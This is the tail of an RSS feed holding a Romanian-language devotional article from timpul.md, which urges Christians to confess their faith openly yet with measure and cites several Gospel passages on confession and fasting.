		<category><![CDATA[credinta]]></category>
		<category><![CDATA[Isus]]></category>
		<category><![CDATA[profet]]></category>
		<guid isPermaLink="false">https://timpul.md/articol/sa-nu-oprim-cuvantul-45720.html/</guid>

					<description><![CDATA[Credința e pavăza noastră. Iar cuvintele noastre sunt mărturie: &#8222;Omul bun, din vistieria cea bună a inimii sale, scoate cele bune, pe c&#226;nd omul rău, din vistieria cea rea a inimii lui, scoate cele rele.&#160;&#160;]]></description>
										<content:encoded><![CDATA[<p>Căci din prisosul inimii grăieşte gura lui.&rdquo; (Luca 6; 45).</p>
<p>Un om care &icirc;şi ascunde credinţa se aseamănă cu o femeie căsătorită care &icirc;şi ascunde verigheta c&acirc;nd face o călătorie şi nu spune nimănui că acasă o aşteaptă un soţ iubitor. Indiferent care ar fi motivul nostru, credinţa trebuie mărturisită ca nu cumva &icirc;n ziua judecăţii să ni se pună &icirc;nainte cuvintele M&acirc;ntuitorului: &bdquo;Oricine va mărturisi pentru Mine &icirc;naintea oamenilor, mărturisi-voi şi Eu pentru el &icirc;naintea Tatălui Meu, Care este &icirc;n ceruri. Iar de cel ce se va lepăda de Mine &icirc;naintea oamenilor şi Eu Mă voi lepăda de el &icirc;naintea Tatălui Meu, Care este &icirc;n ceruri.&rdquo; (Matei 10; 32-33).</p>
<p>Asta nu &icirc;nseamnă să obosim oamenii sau să &icirc;i agasăm pe cei care nu cred. Mai ales că prin insistenţă nepotrivită putem determina un om să hulească cele sfinte. Dacă unui necredincios &icirc;i vom mărturisi credinţa noastră, e destul; nu trebuie să &icirc;i spunem că Euharistia nu e simbolică &ndash; de exemplu &ndash; şi că, aşa cum mărturisim &icirc;n rugăciune: &bdquo;&icirc;ncă cred că acesta este &icirc;nsuşi preacurat Trupul Tău&hellip;&rdquo;. Sunt lucruri care se spun cu măsură. Iisus ne-a atras atenţia asupra grijii pe care trebuie să o avem faţă de cele sfinte: &bdquo;Nu daţi cele sfinte c&acirc;inilor, nici nu aruncaţi mărgăritarele voastre &icirc;naintea porcilor, ca nu cumva să le calce &icirc;n picioare şi, &icirc;ntorc&acirc;ndu-se, să vă sf&acirc;şie pe voi.&rdquo; (Matei 7; 6). Cel mai bine e să răspundem celor care ne &icirc;ntreabă şi să mărturisim celor care ne ascultă. </p>
<p>C&acirc;nd meseria ne permite să mărturisim &icirc;naintea tuturor, aşa cum &icirc;ncerc eu prin aceste articole, nu mai e vorba de a răspunde, ci de a ne strădui să ne &icirc;nmulţim talantul primit de la Dumnezeu. Uneori, e drept, mi se &icirc;nt&acirc;mplă să mă simt ca un om orb la porţile unei cetăţi, după ale cărei ziduri umblă lupi şi alte fiare, iar eu, fără să văd dacă sunt oameni aproape de poarta cetăţii, strig tuturor să răm&acirc;nă &icirc;n cetate că afară umblă flăm&acirc;nde fiarele sălbatice. Nu ştiu niciodată dacă &icirc;n jur e cineva. Iar puşcă de v&acirc;nătoare nu am. De aceea, din pricina slăbiciunii mele, lumea s-ar putea să nu mă creadă. (Mulţumesc pe această cale tuturor celor care &icirc;mi scriu, fiindcă toate cuvintele voastre sunt ca un pahar cu apă la poarta cetăţii. Ca un semn de bunătate şi ca o dovadă că strigătele mele sunt auzite).</p>
<p>&Icirc;n ziua de astăzi, mărturisirea e mult mai uşoară. Nici &icirc;nchisorile comuniste nu mai &icirc;nghit credincioşii, nici profeţii nu mai sunt ucişi cu pietre. Dacă citiţi &icirc;nceputul cărţii lui Ieremia, din Vechiul Testament, veţi &icirc;nţelege c&acirc;t de greu era să fii profet şi &icirc;nvăţător. Prea puţini mureau de bătr&acirc;neţe. &Icirc;nsă astăzi suntem liberi. Putem vorbi. Putem să ne facem cruce c&acirc;nd trecem pe l&acirc;ngă biserică şi să spunem &icirc;n inima noastră: Doamne Iisuse Hristoase, Fiul lui Dumnezeu, miluieşte-ne pe noi şi lumea Ta. Putem să ne botezăm, suntem liberi să mergem la biserică, să citim scripturile &ndash; la care cu c&acirc;teva sute de ani &icirc;n urmă, doar c&acirc;te unii aveau acces.</p>
<p>Pentru că e o mărturisire şi să ne facem cruce c&acirc;nd trecem pe l&acirc;ngă biserici. Postul este tot o mărturisire. Iisus c&acirc;nd a spus &bdquo;Tu &icirc;nsă, c&acirc;nd posteşti, unge capul tău şi faţa ta o spală, ca să nu te arăţi oamenilor că posteşti, ci Tatălui tău care este &icirc;n ascuns, şi Tatăl tău, Care vede &icirc;n ascuns, &icirc;ţi va răsplăti ţie.&rdquo; (Matei 6; 17-18), a avut &icirc;n vedere două aspecte: făţărnicia de a ne arăta trişti &icirc;naintea oamenilor şi postirile pentru nevoile noastre personale. Fiindcă uneori postim mai mult ca să ne pocăim sau ca să cerem ajutor c&acirc;nd suntem str&acirc;mtoraţi. Acesta e postul pe care trebuie să &icirc;l ţinem &icirc;n ascuns. C&acirc;nd &icirc;nsă suntem &icirc;n posturile r&acirc;nduite de Biserică şi ne nimerim la o masă &icirc;ncărcată, nu trebuie să ne ascundem sau să ne ruşinăm, ci cum spunea părintele Teofil: &bdquo;posteşte, şi să postească şi ei&rdquo;. Vedem că şi un gest simplu poate fi o mărturisire a credinţei, fiindcă cei care vor &icirc;nţelege că posteşti, vor şti şi că eşti creştin.</p>
<p>C&acirc;nd vrem să ascundem credinţa noastră suntem ca acei copii care ascund oamenilor numele părinţilor lor din pricina ruşinii. Sunt &icirc;ncredinţată că să ne ruşinăm de Dumnezeu e şi mai grav dec&acirc;t să ne ruşinăm de mama noastră, dar e la fel de ur&acirc;t. Deci să-L mărturisim pe Domnul nostru Iisus Hristos şi &bdquo;să nu oprim cuv&acirc;ntul &icirc;n vreme de m&acirc;ntuire&rdquo; (Ecclesiasticul 4; 25).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://timpul.md/articol/sa-nu-oprim-cuvantul-45720.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
